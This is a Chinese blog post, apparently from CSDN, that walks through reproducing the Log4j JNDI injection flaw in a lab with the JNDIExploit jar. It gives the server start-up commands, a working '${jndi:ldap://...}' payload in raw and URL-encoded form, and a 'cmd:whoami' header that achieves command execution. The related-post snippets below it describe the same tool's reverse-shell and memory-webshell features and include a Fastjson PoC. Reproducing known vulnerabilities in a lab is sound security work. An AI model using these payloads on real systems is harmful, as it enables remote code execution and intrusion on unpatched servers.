JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

最新推荐文章于 2024-09-13 07:26:45 发布
最新推荐文章于 2024-09-13 07:26:45 发布
阅读量2.1k 收藏 3
点赞数
文章标签: jar log4j java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/132733709
版权
本文介绍了如何利用Log4j漏洞搭建靶场,执行JavaJNDIExploit,通过构造特定payload并进行URL编码,成功在Windows环境中执行命令,如ldap://null:1389/TomcatBypass/TomcatEcho并查看用户权限。
摘要由CSDN通过智能技术生成

1.首先搭建log4j靶场
在这里插入图片描述
在这里插入图片描述

2.开启服务
Windows攻击端执行以下命令
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1
在这里插入图片描述

再开一个cmd可以看下能用什么payload
java -jar JNDIExploit-1.2-SNAPSHOT.jar -u
在这里插入图片描述

以上payload都可以尝试,我们使用
ldap://null:1389/TomcatBypass/TomcatEcho
3.构造请求
${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}
转成URL
%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D
4.开启bp
请求包中增加cmd:whoami
在这里插入图片描述

执行后发现命令可以执行
在这里插入图片描述

JNDIExploit-1.2-SNAPSHOT
02-23
JNDIExploit-1.2-SNAPSHOT
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
JNDI-Injection-Exploit 项目使用教程
最新发布
gitblog_00727的博客
09-13 805
JNDI-Injection-Exploit 项目使用教程 JNDI-Injection-Exploit JNDI命令注入利用 项目地址: https://gitcode.com/gh_mirrors/jnd/JNDI-Injec...
使用JNDIExploit-1.2-SNAPSHOT.jar复现log4j2详细流程
m0_74196038的博客
03-19 1591
还有就是之所以这个实验做了两次,就是因为在这个实验当,我第一次做的时候,由于这个复现使用那个脚本,所以直接使用命令去开启http服务和ldap服务 ,但是我发现开启了http服务,但是没法访问到,我以为是环境的问题,就打算第二天再做。结果第二天还是不行,后来终于搞明白了,他这里使用工具开启http服务的指令,实际上并没有真正的开启http服务,只是做了一个端口监听,让靶机误以为开启了ldap服务和http服务。-i 指定开启服务的ip,也就是攻击者的ip,也可以是黑客的公网服务器。
JNDIExploit使用方法
qq_50854662的博客
02-28 4429
JNDIExploit使用方法
JNDI注入利用工具JNDIExploit v1.1
qq_21039641的博客
07-04 1734
一款用于JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,集成了JDNI注入格式,能够更加方便的开启服务端后直接利用,支持反弹Shell命令执行、直接植入内存shell等,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
JNDIExploit-1.4-SNAPSHOT.jar
01-10
编译后的JNDIExploit-1.4-SNAPSHOT.jar,可以直接用,1.4版本支持tomcatBypass路由直接上线msf。
JNDIExploit-1.3-SNAPSHOT.jar
04-28
JNDIExploit是一款常用的用于JNDI注入利用的工具,命令执行&代码执行漏洞常用的测试工具
weblogic-CVE-2023-21839-JNDIExploit-1.4-SNAPSHOT.jar
02-28
weblogic-CVE-2023-21839-JNDIExploit-1.4-SNAPSHOT.jar
JNDIExploit-用于 JNDI注入利用的工具
04-16
一款用于 JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用使用 java -jar JNDIExploit.jar -h 查看参数说明,其 --ip 参数为必选参数
JNDIExploit.zip
12-14
JNDIExploit
JNDI-Inject-Exploit
11-04
# JNDI-Inject-Exploit ## 免责声明 本工具仅面向**合法授权的企业安全测试**,如您需测试本工具的可用性请自行搭建靶机环境,在使用工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。**请勿对非授权目标进行扫描,如您在使用工具的过程存在任何非法行为,您需自行承担相应后果,作者将不承担任何法律及连带责任。** ## Introduce > 本工具用于解决 Fastjson、log4j2、原生JNDI注入等场景针对高版本JDK无法加载远程恶意类,通过LDAP服务器返回原生Java反序列化数据,受害者(客户端)在具备反序列化Gadget依赖的情况下可达到命令执行、代码执行、回显命令执行、无文件落地内存马注册等。 > > Solve the high version of JDK Bypass, like FastJson, Jackson, Log4j2, native JNDI injection vulnerabilities, and detect locally available deserialization gad
jndi-1.2.1.jar.zip
03-20
ndi1..2.1所需要的jar,1,。2.1
jamod-1.2-SNAPSHOT.jar
11-01
本文将详细探讨jamod-1.2-SNAPSHOT.jar这个库的核心功能、工作原理以及如何在实际项目使用。 一、jamod库介绍 jamod,全称为Java Modbus,是专为Java平台设计的Modbus通信库。它提供了一套完整的API,用于处理...
Exploitng JNDI Injection In Java
测试
01-11 666
概要https://www.veracode.com/blog/research/exploiting-jndi-injections-java跟着这文章调了一遍, 之前一度以为在jdk 8u191之后, JNDI注入也就只能打打反序列了,看了这文章后发现了一种新的场景。之前JNDI注入都是依靠于getObjectFactoryFromReference时,如果目标classpath里找不到指定的...
探秘MYJNDIExploitJava安全漏洞利用工具
gitblog_00032的博客
03-31 437
探秘MYJNDIExploitJava安全漏洞利用工具 去发现同类优质开源项目:https://gitcode.com/ 在网络安全领域,了解并掌握漏洞利用是提升防御能力的重要步骤。今天,我们要介绍的是一个名为MYJNDIExploit的开源项目,它是一个专门针对Java JNDIJava Naming and Directory Interface)漏洞的利用工具。通过本文,我们将一起探索该...
jndiexploit-1.2-snapshot.jar
04-10
Q: 'b'jndiexploit-1.2-snapshot.jar'' A: 这是一个JAR文件,可能包含有关JNDI注入攻击的信息和工具JNDI注入攻击是一种利用Java命名和目录接口(JNDI)实现的攻击,此类攻击可以利用目标系统运行的Java应用程序漏洞来执行任意代码或获取敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值